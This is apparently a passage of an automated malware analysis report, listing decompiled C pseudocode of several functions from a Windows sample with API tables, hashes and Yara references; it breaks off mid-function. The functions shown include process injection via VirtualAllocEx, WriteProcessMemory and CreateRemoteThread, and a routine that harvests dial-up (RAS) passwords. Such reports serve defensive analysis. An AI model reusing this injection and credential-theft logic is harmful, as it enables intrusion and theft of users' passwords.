                                    			E00408AD5(signed int* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, signed int __esi, char _a1, signed int _a73) {
				long* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed char _t43;
				long* _t50;
				intOrPtr _t66;
				intOrPtr _t71;
				void* _t76;
				void* _t94;
				intOrPtr _t103;
				intOrPtr _t104;
				signed char _t112;
				void* _t113;
				signed int _t115;
				void* _t116;
				char* _t117;
				void* _t119;

				asm("adc [edx], eax");
				_t43 =  *__eax ^  *[cs:ecx];
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *__ecx =  *__ecx + __edx;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				asm("adc [eax], al");
				_t115 = __esi | _a73;
				_t117 =  &_a1;
				asm("aaa");
				_pop(_t111);
				asm("arpl [gs:edi+0x64], bp");
				_push(_t117);
				_push(_t117);
				_push(_t115);
				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v16 = 0;
				_t116 = __edx;
				_t112 = _t43;
				_push(_t119);
				_push(0x408c74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119 + 0xffffffd8;
				_t94 = 0;
				E00401AC0(__edx);
				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0x8004);
				_t50 = _v8;
				_push(_t50);
				L00408978();
				if(_t50 != 0) {
					_push(0);
					E00402218( &_v28, _t112);
					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
					_push(_t112);
					_t66 = _v12;
					_push(_t66);
					L00408980();
					if(_t66 != 0) {
						_v20 = 0x14;
						_push(0x14);
						E00402FBC();
						_push(0);
						_push( &_v20);
						_push(_v16);
						_push(2);
						_t71 = _v12;
						_push(_t71);
						L00408970();
						if(_t71 != 0) {
							_push(_v12);
							L00408988();
							CryptReleaseContext(_v8, 0);
							_t76 = _v20 - 1;
							if(_t76 >= 0) {
								_v24 = _t76 + 1;
								_t113 = 0;
								do {
									_t94 = _t94 +  *(_v16 + _t113);
									_v40 =  *(_v16 + _t113) & 0x000000ff;
									_v36 = 0;
									E004089C8(0x408c8c, _t94, 0,  &_v40, _t113, _t116,  &_v32);
									E00401D58(_t116, _v32);
									_t113 = _t113 + 1;
									_t30 =  &_v24;
									 *_t30 = _v24 - 1;
								} while ( *_t30 != 0);
							}
							_v40 = 0;
							_v36 = 0;
							E004089C8(0x408c8c, _t94, 0,  &_v40, _t112, _t116,  &_v44);
							E00401D58(_t116, _v44);
						}
					}
				}
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00408C7B);
				E00401AC0( &_v44);
				E00401AC0( &_v32);
				E00402108( &_v28);
				_t104 =  *0x408ad4; // 0x408ad8
				return E00402FC8( &_v16, _t104);
			}



























                                    0x00408ad8
                                    0x00408ada
                                    0x00408add
                                    0x00408adf
                                    0x00408ae1
                                    0x00408ae3
                                    0x00408ae5
                                    0x00408ae7
                                    0x00408ae9
                                    0x00408aec
                                    0x00408aef
                                    0x00408af0
                                    0x00408af1
                                    0x00408af2
                                    0x00408af7
                                    0x00408af8
                                    0x00408aff
                                    0x00408b03
                                    0x00408b06
                                    0x00408b09
                                    0x00408b0c
                                    0x00408b0f
                                    0x00408b11
                                    0x00408b15
                                    0x00408b16
                                    0x00408b1b
                                    0x00408b1e
                                    0x00408b21
                                    0x00408b25
                                    0x00408b36
                                    0x00408b3e
                                    0x00408b3f
                                    0x00408b41
                                    0x00408b43
                                    0x00408b48
                                    0x00408b4b
                                    0x00408b4c
                                    0x00408b53
                                    0x00408b59
                                    0x00408b60
                                    0x00408b70
                                    0x00408b71
                                    0x00408b72
                                    0x00408b75
                                    0x00408b76
                                    0x00408b7d
                                    0x00408b83
                                    0x00408b8a
                                    0x00408b9a
                                    0x00408ba2
                                    0x00408ba7
                                    0x00408bab
                                    0x00408bac
                                    0x00408bae
                                    0x00408bb1
                                    0x00408bb2
                                    0x00408bb9
                                    0x00408bc2
                                    0x00408bc3
                                    0x00408bce
                                    0x00408bd6
                                    0x00408bd9
                                    0x00408bdc
                                    0x00408bdf
                                    0x00408be1
                                    0x00408be4
                                    0x00408bf2
                                    0x00408bf5
                                    0x00408c03
                                    0x00408c0d
                                    0x00408c12
                                    0x00408c13
                                    0x00408c13
                                    0x00408c13
                                    0x00408be1
                                    0x00408c20
                                    0x00408c23
                                    0x00408c31
                                    0x00408c3b
                                    0x00408c3b
                                    0x00408bb9
                                    0x00408b7d
                                    0x00408c42
                                    0x00408c45
                                    0x00408c48
                                    0x00408c50
                                    0x00408c58
                                    0x00408c60
                                    0x00408c68
                                    0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction ID: d3845163c2b931c13764af6d44d3521470b732fafe65dfe0c77c1fbeb44f725f
                                    • Opcode Fuzzy Hash: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction Fuzzy Hash: 04513070A04249AFDB01EBA5C941BEEBBB8AF09304F5540BFF540F72D1DA7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408AF8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 61%
                                    			E00408AF8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				long* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				char _v44;
				long* _t47;
				intOrPtr _t63;
				intOrPtr _t68;
				void* _t73;
				void* _t91;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t114;

				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v16 = 0;
				_t111 = __edx;
				_t108 = __eax;
				_push(_t114);
				_push(0x408c74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114 + 0xffffffd8;
				_t91 = 0;
				E00401AC0(__edx);
				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0x8004);
				_t47 = _v8;
				_push(_t47);
				L00408978();
				if(_t47 != 0) {
					_push(0);
					E00402218( &_v28, _t108);
					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
					_push(_t108);
					_t63 = _v12;
					_push(_t63);
					L00408980();
					if(_t63 != 0) {
						_v20 = 0x14;
						_push(0x14);
						E00402FBC();
						_push(0);
						_push( &_v20);
						_push(_v16);
						_push(2);
						_t68 = _v12;
						_push(_t68);
						L00408970();
						if(_t68 != 0) {
							_push(_v12);
							L00408988();
							CryptReleaseContext(_v8, 0);
							_t73 = _v20 - 1;
							if(_t73 >= 0) {
								_v24 = _t73 + 1;
								_t109 = 0;
								do {
									_t91 = _t91 +  *(_v16 + _t109);
									_v40 =  *(_v16 + _t109) & 0x000000ff;
									_v36 = 0;
									E004089C8(0x408c8c, _t91, 0,  &_v40, _t109, _t111,  &_v32);
									E00401D58(_t111, _v32);
									_t109 = _t109 + 1;
									_t29 =  &_v24;
									 *_t29 = _v24 - 1;
								} while ( *_t29 != 0);
							}
							_v40 = 0;
							_v36 = 0;
							E004089C8(0x408c8c, _t91, 0,  &_v40, _t108, _t111,  &_v44);
							E00401D58(_t111, _v44);
						}
					}
				}
				_pop(_t99);
				 *[fs:eax] = _t99;
				_push(E00408C7B);
				E00401AC0( &_v44);
				E00401AC0( &_v32);
				E00402108( &_v28);
				_t100 =  *0x408ad4; // 0x408ad8
				return E00402FC8( &_v16, _t100);
			}
























                                    0x00408b03
                                    0x00408b06
                                    0x00408b09
                                    0x00408b0c
                                    0x00408b0f
                                    0x00408b11
                                    0x00408b15
                                    0x00408b16
                                    0x00408b1b
                                    0x00408b1e
                                    0x00408b21
                                    0x00408b25
                                    0x00408b36
                                    0x00408b3e
                                    0x00408b3f
                                    0x00408b41
                                    0x00408b43
                                    0x00408b48
                                    0x00408b4b
                                    0x00408b4c
                                    0x00408b53
                                    0x00408b59
                                    0x00408b60
                                    0x00408b70
                                    0x00408b71
                                    0x00408b72
                                    0x00408b75
                                    0x00408b76
                                    0x00408b7d
                                    0x00408b83
                                    0x00408b8a
                                    0x00408b9a
                                    0x00408ba2
                                    0x00408ba7
                                    0x00408bab
                                    0x00408bac
                                    0x00408bae
                                    0x00408bb1
                                    0x00408bb2
                                    0x00408bb9
                                    0x00408bc2
                                    0x00408bc3
                                    0x00408bce
                                    0x00408bd6
                                    0x00408bd9
                                    0x00408bdc
                                    0x00408bdf
                                    0x00408be1
                                    0x00408be4
                                    0x00408bf2
                                    0x00408bf5
                                    0x00408c03
                                    0x00408c0d
                                    0x00408c12
                                    0x00408c13
                                    0x00408c13
                                    0x00408c13
                                    0x00408be1
                                    0x00408c20
                                    0x00408c23
                                    0x00408c31
                                    0x00408c3b
                                    0x00408c3b
                                    0x00408bb9
                                    0x00408b7d
                                    0x00408c42
                                    0x00408c45
                                    0x00408c48
                                    0x00408c50
                                    0x00408c58
                                    0x00408c60
                                    0x00408c68
                                    0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction ID: 55925fcc99f9e55126638c730d6fbe2105b7814248b5782dab5394ac9007a686
                                    • Opcode Fuzzy Hash: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction Fuzzy Hash: EE412470A442099BDB00EBA5C942BEEB7F8EF48704F54407EF540F72D1DB7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AF08, Relevance: 10.6, APIs: 7, Instructions: 70injectionmemorythreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E0040AF08(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				_Unknown_base(*)()* _v36;
				void* _t18;
				void* _t30;
				struct HINSTANCE__* _t32;
				void* _t35;
				long _t36;
				void* _t37;

				_v32 = __ecx;
				_v36 = __edx;
				_t30 = __eax;
				_v28 = 0;
				_t32 = GetModuleHandleA(0);
				_push(0);
				_push(_t32);
				asm("cdq");
				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
				asm("adc edx, [esp+0x4]");
				_t36 =  *(_t18 + 0x50);
				_t35 =  *(_t18 + 0x34);
				VirtualFreeEx(_t30, _t35, 0, 0x8000);
				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40);
				if(_t37 != 0) {
					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);
					if(_t36 <= _v24) {
						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
						CloseHandle(_t30);
						_v32 = _t37;
					}
				}
				return _v28;
			}














                                    0x0040af0f
                                    0x0040af13
                                    0x0040af16
                                    0x0040af1a
                                    0x0040af25
                                    0x0040af2b
                                    0x0040af2c
                                    0x0040af30
                                    0x0040af31
                                    0x0040af34
                                    0x0040af3b
                                    0x0040af3e
                                    0x0040af4a
                                    0x0040af5e
                                    0x0040af62
                                    0x0040af74
                                    0x0040af7d
                                    0x0040af95
                                    0x0040af9b
                                    0x0040afa0
                                    0x0040afa0
                                    0x0040af7d
                                    0x0040afaf

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                                    • String ID:
                                    • API String ID: 2398686212-0
                                    • Opcode ID: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction ID: ba714f15e26322d81a3db079e442bf4d00767b5fd8d80c8da630a050ea91888e
                                    • Opcode Fuzzy Hash: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction Fuzzy Hash: D71142B12443007FD210EE698C46F2BBBDCDFC5715F44882EB658E72D1D674E904876A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404E10, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00404E10() {

				if( *0x40e944 == 0) {
					 *0x40e944 = GetModuleHandleA("kernel32.dll");
					if( *0x40e944 != 0) {
						 *0x40e948 = GetProcAddress( *0x40e944, "CreateToolhelp32Snapshot");
						 *0x40e94c = GetProcAddress( *0x40e944, "Heap32ListFirst");
						 *0x40e950 = GetProcAddress( *0x40e944, "Heap32ListNext");
						 *0x40e954 = GetProcAddress( *0x40e944, "Heap32First");
						 *0x40e958 = GetProcAddress( *0x40e944, "Heap32Next");
						 *0x40e95c = GetProcAddress( *0x40e944, "Toolhelp32ReadProcessMemory");
						 *0x40e960 = GetProcAddress( *0x40e944, "Process32First");
						 *0x40e964 = GetProcAddress( *0x40e944, "Process32Next");
						 *0x40e968 = GetProcAddress( *0x40e944, "Process32FirstW");
						 *0x40e96c = GetProcAddress( *0x40e944, "Process32NextW");
						 *0x40e970 = GetProcAddress( *0x40e944, "Thread32First");
						 *0x40e974 = GetProcAddress( *0x40e944, "Thread32Next");
						 *0x40e978 = GetProcAddress( *0x40e944, "Module32First");
						 *0x40e97c = GetProcAddress( *0x40e944, "Module32Next");
						 *0x40e980 = GetProcAddress( *0x40e944, "Module32FirstW");
						 *0x40e984 = GetProcAddress( *0x40e944, "Module32NextW");
					}
				}
				if( *0x40e944 == 0 ||  *0x40e948 == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                    0x00404e19
                                    0x00404e29
                                    0x00404e2e
                                    0x00404e41
                                    0x00404e53
                                    0x00404e65
                                    0x00404e77
                                    0x00404e89
                                    0x00404e9b
                                    0x00404ead
                                    0x00404ebf
                                    0x00404ed1
                                    0x00404ee3
                                    0x00404ef5
                                    0x00404f07
                                    0x00404f19
                                    0x00404f2b
                                    0x00404f3d
                                    0x00404f4f
                                    0x00404f4f
                                    0x00404e2e
                                    0x00404f57
                                    0x00404f65
                                    0x00404f66
                                    0x00404f69
                                    0x00404f69

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00405097,?,00000000,0040520D,00000000,004052C4), ref: 00404E24
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00404E3C
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 00404E4E
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404E60
                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00404E72
                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00404E84
                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 00404E96
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00404EA8
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00404EBA
                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00404ECC
                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00404EDE
                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404EF0
                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404F02
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404F14
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404F26
                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404F38
                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 00404F4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                    • API String ID: 667068680-597814768
                                    • Opcode ID: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction ID: fe5771f8beb9365a204d6e2904ce85914b9e0a1e64c90e6c75949bdee210121a
                                    • Opcode Fuzzy Hash: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction Fuzzy Hash: D531D7F0A01710ABEB60AFB69986A2A3BA8EB857057140D77B100FF2D5C67D8D508B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040822C, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 304COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E0040822C(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a82) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				struct _OSVERSIONINFOA _v200;
				char _v476;
				char _v733;
				char _v1248;
				char _v1252;
				signed int _v3020;
				signed int _v3024;
				signed int _v3028;
				signed int _v3032;
				signed int _v3036;
				char _v3284;
				char _v3288;
				char _v3292;
				signed int _v3296;
				signed int _v3300;
				intOrPtr* _t114;
				void* _t131;

				_push(__ebx);
				_push(__edx | _a82);
				asm("popad");
				if(__ecx + 1 < 0) {
					_t131 = __eax;
					_t114 = E0040806C("RasGetEntryProperties", __ebx, __eax);
					return  *_t114(_t131, __edi, _v4, _a16, _a12, _a8);
				} else {
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp + 0xfffff328;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__edx = 0;
					_v3296 = 0;
					_v3300 = 0;
					_v3036 = 0;
					_v3032 = 0;
					_v32 = 0;
					_v36 = 0;
					_v40 = 0;
					_v48 = 0;
					_v52 = 0;
					_v56 = 0;
					_v16 = __eax;
					__eax = 0;
					_push(__ebp);
					_push(0x40861b);
					_push( *[fs:eax]);
					 *[fs:eax] = __esp;
					_v16 = E00401AC0(_v16);
					_v28 = E00407FF0();
					__eflags = _v28;
					if(_v28 != 0) {
						__eax = _v20;
						_push(_v20);
						__eax =  &_v24;
						__ecx = 1;
						__edx =  *0x408214; // 0x408218
						__eax = E00402FBC();
						__esp = __esp + 4;
						__edx = _v24;
						__eax = 0x108;
						 *_v24 = 0x108;
						__edx = 0x108 * _v20 >> 0x20;
						__eax = 0x108 * _v20;
						_v12 = 0x108 * _v20;
						__eax =  &_v20;
						_push( &_v20);
						__eax =  &_v12;
						_push( &_v12);
						__eax = _v24;
						_push(__eax);
						_push(0);
						_push(0);
						L00407B84();
						__eflags = __eax;
						if(__eax == 0) {
							_v200.dwOSVersionInfoSize = 0x94;
							 &_v200 = GetVersionExA( &_v200);
							__eax =  &_v28;
							__edx = 0x105;
							__eax = E00402074( &_v28, 0x105);
							__eax =  &_v32;
							__edx = 0x105;
							__eax = E00402074( &_v32, 0x105);
							__eflags = _v200.dwPlatformId - 2;
							if(_v200.dwPlatformId == 2) {
								__eflags = _v200.dwMajorVersion - 5;
								if(_v200.dwMajorVersion >= 5) {
									_push(0);
									_push(0x1a);
									__eax =  &_v28;
									__eax = E00401F9C( &_v28);
									_push(__eax);
									_push(0);
									L00407B7C();
									__eflags = __eax;
									if(__eflags != 0) {
										__edx =  &_v3024;
										_v28 = E00407F4C(_v28,  &_v3024, __eflags);
										__edx = _v3024;
										 &_v28 = E00401B58( &_v28, _v3024);
									}
									_push(0);
									_push(0x23);
									__eax =  &_v32;
									__eax = E00401F9C( &_v32);
									_push(__eax);
									_push(0);
									L00407B7C();
									__eflags = __eax;
									if(__eflags != 0) {
										__edx =  &_v3028;
										_v32 = E00407F4C(_v32,  &_v3028, __eflags);
										__edx = _v3028;
										 &_v32 = E00401B58( &_v32, _v3028);
									}
									__eax = E00407E40(__ebx, __ecx, __edi, __esi, __eflags);
								}
							}
							_v36 = 0xffffffff;
							__eax = _v20;
							__eax = _v20 - 1;
							__eflags = __eax;
							if(__eax >= 0) {
								_v52 = __eax;
								__esi = 0;
								__eflags = 0;
								do {
									_v1252 = 0x41c;
									__esi = __esi << 5;
									__ebx = (__esi << 5) + __esi;
									__eax = _v24;
									__eax = _v24 + 4 + __ebx * 8;
									__edx =  &_v1248;
									__ecx = 0x100;
									E00401258(_v24 + 4 + __ebx * 8, 0x100,  &_v1248) =  &_v36;
									_push( &_v36);
									__eax =  &_v1252;
									_push( &_v1252);
									_push(0);
									L00407B8C();
									_v12 = 0x6e8;
									__eax =  &_v3020;
									__ecx = 0;
									__edx = _v12;
									E00401414( &_v3020, _v12) = _v12;
									_v3020 = _v12;
									 &_v12 =  &_v16;
									__eax = _v24;
									__edx = _v24 + 4 + __ebx * 8;
									__ecx =  &_v3020;
									0 = E004081BC(0, _v24 + 4 + __ebx * 8,  &_v16, 0,  &_v12);
									__eflags = _v200.dwPlatformId - 2;
									if(_v200.dwPlatformId == 2) {
										__eflags = _v200.dwMajorVersion - 5;
										if(_v200.dwMajorVersion >= 5) {
											__eax = _v28;
											__eflags =  *_v28;
											if( *_v28 != 0) {
												L17:
												__eax =  &_v40;
												__edx =  &_v1248;
												__eax = E00401CAC( &_v40,  &_v1248);
												__edx =  &_v44;
												_v40 = E00403268(_v40, __ebx, __ecx,  &_v44, __esi, __eflags);
												 &_v28 = E00401F9C( &_v28);
												__eax = _v40;
												__eax = E00401F48(_v40);
												__edi = __eax;
												__ebx = __eax;
												__eflags = __ebx;
												if(__ebx == 0) {
													__eax =  &_v32;
													__eax = E00401F9C( &_v32);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx == 0) {
													 &_v28 = E00401F9C( &_v28);
													__eax = _v44;
													__eax = E00401F48(_v44);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx == 0) {
													 &_v32 = E00401F9C( &_v32);
													__eax = _v44;
													__eax = E00401F48(_v44);
													__ebx = __eax;
												}
												__eflags = __ebx;
												if(__ebx > 0) {
													__eax = __ebx;
													__edx = 0;
													__eflags = 0;
													 &_v3284 = E00402BC0( &_v3284, __ebx, 0);
													__edx =  &_v3284;
													 &_v48 = E00401D18( &_v48,  &_v3284, __eflags);
													__edi = 0x100;
													__ebx = 0x40e9bc;
													do {
														__eax =  *__ebx;
														__edx = _v48;
														__eax = E00401E94( *__ebx, _v48);
														if(__eflags == 0) {
															__eflags =  *(__ebx + 4);
															if( *(__ebx + 4) != 0) {
																_t92 = __ebx + 4; // 0x0
																__eax =  *_t92;
																_push(E00401D50( *_t92));
																_t93 = __ebx + 4; // 0x0
																__eax =  *_t93;
																__edx = E00401F48( *_t93);
																__eax =  &_v476;
																_pop(__ecx);
																__eax = E00408038( &_v476, __ecx, __edx);
															}
														}
														__ebx = __ebx + 8;
														__edi = __edi - 1;
														__eflags = __edi;
													} while (__edi != 0);
												}
											} else {
												__eax = _v32;
												__eflags =  *_v32;
												if( *_v32 != 0) {
													goto L17;
												}
											}
										}
									}
									__eax =  &_v733;
									__eflags =  &_v733;
									if( &_v733 != 0) {
										__eax =  &_v476;
										__eflags =  &_v476;
										if( &_v476 != 0) {
											__eax = _v8;
											_push( *_v8);
											_push("RAS Passwords |");
											__eax =  &_v3288;
											__edx =  &_v733;
											__eax = E00401CAC( &_v3288,  &_v733);
											_push(_v3288);
											_push(0x40865c);
											__eax =  &_v3292;
											__edx =  &_v476;
											__eax = E00401CAC( &_v3292,  &_v476);
											_push(_v3292);
											_push(0x40865c);
											_push(0x408668);
											__eax = _v8;
											__edx = 7;
											E00401E10();
										}
									}
									__esi = __esi + 1;
									_t105 =  &_v52;
									 *_t105 = _v52 - 1;
									__eflags =  *_t105;
								} while ( *_t105 != 0);
							}
						}
					}
					__eax = 0;
					__eflags = 0;
					_pop(__edx);
					_pop(__ecx);
					_pop(__ecx);
					 *[fs:eax] = __edx;
					_push(E00408622);
					__eax =  &_v3292;
					__edx = 2;
					__eax = E00401AE4( &_v3292, 2);
					__eax =  &_v3028;
					__edx = 2;
					__eax = E00401AE4( &_v3028, 2);
					__eax =  &_v48;
					__edx = 3;
					__eax = E00401AE4( &_v48, 3);
					__eax =  &_v32;
					__edx = 2;
